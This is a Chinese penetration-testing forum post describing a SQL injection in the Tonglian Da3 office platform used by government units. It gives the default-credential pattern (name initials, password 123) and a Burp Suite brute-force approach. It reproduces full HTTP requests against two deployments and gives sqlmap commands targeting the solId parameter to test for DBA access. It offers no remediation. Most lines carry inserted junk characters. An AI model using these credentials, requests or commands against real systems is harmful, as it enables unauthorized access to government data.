中国网络渗透测试联盟

标题: 同联Da3协同办公平台前台通用sql injection漏洞 [打印本页]

作者: admin 时间: 2018-10-20 20:15
标题: 同联Da3协同办公平台前台通用sql injection漏洞

' `" J1 B1 h7 z& S2 I4 j
! u( B4 Z3 y& {

8 Q8 k+ a) k+ l( z6 _/ P 平台简介：* E7 Q2 r5 e* Q* X0 G

$ Y% I* |: G2 p/ w 9 {/ V. d9 @) C+ G) Y& v9 s- {- G

- Y5 n; `! [; o9 \& x0 ~* ^ Z 北京同联信息技术有限公司（以下简称同联）由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务，以加强各级政府的精细化、智能化管理，形成高效、敏捷、便民的新型政府。”为使命，致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
( Y9 p1 ~+ n/ f( Y! Z ?同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位，分别提供以“移动政务办公”为主的Da3系列管理软件；针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
& o3 m3 g' y- n% U8 k, H2 X: O. |4 B同联本着“协作、专业、创新”的工作方针，为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献！ ; l; q$ X& d( {9 n

5 j( b3 p8 O. M& F0 S7 m % R2 A6 W7 s8 ?! k) |1 G

0 n! M- [% s7 Y+ s" @: B/ ?$ d1 p 由于此程序为新开发的程序，故能找到的案例并不多，下面附案例地址：( q. ]# o2 R5 r( q9 P

4 t% R0 x* e; U, W# | h2 ~/ @2 P & C( s0 f1 c1 {% k1 D/ v

+ y' Q# x' J c http://1.1.1.1:7197/cap-aco/#（案例2-）0 L; j" e3 I1 Q! w2 E3 t8 `

E5 {+ [9 B7 L6 R- o2 J http://www.XXOO.com （案例1-官网网站） * f L( `# H4 n' z' @) @

4 m7 O0 r7 Q9 ^, c, F F+ ?+ y, Z ( I3 T' [. I6 R9 O# V4 P$ z

2 I7 M N5 t& B) @ 漏洞详情:3 C2 b5 u# J! F" L0 P1 j

% l- _; \4 J: u" k! k6 K 初步确定平台的默认账号为姓名的首字母小写，初始密码为123，为了能够更好的模拟入侵，使用黑盒测试手段进行测试& q y6 w0 h- O4 E! U

9 m/ r. y# x" ?: o, @/ E: \, G# ? 首先使用burpsuite代理，然后再用黑客字典生成一个全英文小写的3位字典，利用burpsuite进行暴力破解，破解结果如图：( I s2 s4 `/ g/ \

3 N9 B8 [) z+ F) U6 F4 c1 w- P 1 [* T: {& M; M) B

! V0 b2 c8 U4 p! l( O9 [ 6 Z8 |' S4 Q! q6 n/ F- V

9 r l4 Z) p1 ~ status为302即表示破解成功，然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包，抓包的数据分别如下： % ~ F* p+ w" x) ~3 m3 l# `$ k

; a1 m2 k! a" Z* g$ F; `. B 1、案例1-官方网站' ^* {- e/ h8 s. y) j5 i# j3 E

+ H: t, [ _) |) d- e GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1! x6 U$ V: f+ ~8 O

* B& ~0 x5 v: q Host: www.XXOO.com ^4 H3 f) m6 ?- d# V( s1 h

7 B" u) A; u6 _ N Proxy-Connection: Keep-Alive \) I. }7 N1 Y% X; m. h3 E

5 U( n) E8 P2 m* _ Accept: application/json, text/javascript, */*; q=0.018 v y3 [. \ v6 ]2 a; d; O

& l* A% U6 W% x+ q/ x Accept-Language: zh-CN ' N8 t; f+ A8 \3 @+ v

- v% b7 t' \/ H% o" X Content-Type: application/json $ [7 k/ g4 j2 M f& v

' l7 M1 O$ u4 @% ^) C1 F9 D User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko + I. W/ u9 i$ Q9 o

- U# {' d: d z X-Requested-With: XMLHttpRequest ) @9 d( K6 z9 s! I+ w7 G3 x8 L

6 t: m- B6 Z4 ` Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002/ t- P* [' t# E6 X: [3 E

% h: d1 c3 K! b Accept-Encoding: gzip, deflate, sdch* j( c' {# w' j& L8 Y% S

3 T! t0 j* E9 h) s Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e# d5 k" F2 y0 Y" J, o7 f7 W

: B" v5 P# F- W% \3 `8 Q$ q 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为：sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: - f8 \9 D! E+ B; s8 [$ p

8 T; |: X' p/ d! I) w2 Z7 W! V 1 ?; U. ?4 L% F8 ~

4 r* c- d: m- |' o3 ?; y , g' G# Y0 s2 g4 `) h" S& s3 U% x0 m

. E6 ]& f& X- L" i& ?3 r* i! x* _% ` ; l$ h, M$ E7 ?; e4 O1 z; }

, @& L0 @! H9 p: \1 o( W# D4 G+ u / D! y& |( i0 T8 r. U& r2 ]

( j/ _- o/ I5 _4 ^ ; \7 J5 g5 s# g2 Y8 V

' L* s" E$ w& ?& N v& ?" A 2、案例2-某天河云平台 + G! \6 b, h0 }7 @4 \

4 _3 S5 t. B$ b! v; p4 i9 L( Y! s- Q GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1& S2 F8 r$ d! s: s# Z, o

* n4 W" }0 x0 K- F4 I Host: 1.1.1.:7197! \% ~, g& Q' s3 e# Y

! v0 k$ _0 z5 U4 F: b, Y Accept: application/json, text/javascript, */*; q=0.01- f" S% g3 s) |/ V! i8 M

! h- D' w& b$ N7 [8 I X-Requested-With: XMLHttpRequest 9 b' \4 [, W, D( q

: K" g: I! P/ A6 [ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 5 L$ ~2 j# c. V

4 w' j$ j! q$ l+ ^& E. Z: O; x, x$ l Content-Type: application/json$ ?+ ?# t& i f; Z2 ]

3 l, m: m1 N, r5 ~* ~) I Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 4 t4 k+ F# N; r* H7 {. r

- P$ O5 J- E, t& u, ]: m* b Accept-Language: zh-CN,zh;q=0.8 - e' H2 u( C' d! n5 D$ x( O

. |# r, `$ i& I" M1 a Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=11 _8 ]5 Z+ u1 r$ q. k

( j, I; a' b9 Y: `( m \4 b" m0 ~ Connection: close $ h& r/ K& i S! l6 h) l

* i% ]6 ]; t+ t4 o 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为：sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:$ J$ a+ A b" K3 a( p/ Q; j

4 F6 [; H2 j5 t+ |. ~ / L' o) G2 k+ U& r2 Z1 Y T% v* f

1 t s/ V6 p; p6 n. F) Z
5 z& V2 b5 Q2 ^% S. G; z1 z

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)